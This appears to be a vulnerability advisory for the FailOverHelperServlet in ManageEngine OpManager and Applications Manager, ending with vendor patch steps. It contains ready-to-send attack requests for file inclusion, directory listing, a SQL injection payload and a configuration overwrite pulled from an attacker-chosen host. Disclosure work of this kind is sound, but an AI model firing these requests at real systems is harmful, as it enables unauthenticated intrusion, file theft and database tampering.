Vulnerabilities in FailOverHelperServlet
>> Technical details:
The affected servlet is the "FailOverHelperServlet" or if you prefer
FailServlet.
It is possible to hijack the failover operation completely.
#1
Vulnerability: Local file include
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory
and its children
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
#4
Vulnerability: Database configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
This will cause the server to make a request to
http://192.168.56.101/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServletcopy?operation=copyfile&fileName=bla
in exactly the same as vulnerability #1. The file will then overwrite
./conf/database_params.conf
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=requestToConfBackup&serverhost=192.168.56.101&serverport=80&webprotocol=http&fileName=bla
#5
Vulnerability: License configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Note that you can only overwrite the license file with another valid
license and do not control the path. So it's a very very low risk
vulnerability (if it can be called that).
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=licensefile
We have patch for these vulnerabilities for build 11400.
Steps to apply the patch.
1. Stop the OpManager Service.
2. Take the backUp of <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
2. Take the backUp of <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
3. Extract the attached zip under <OpManager home>
It will extract the patch under WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
4)Stop and Start Opmanager.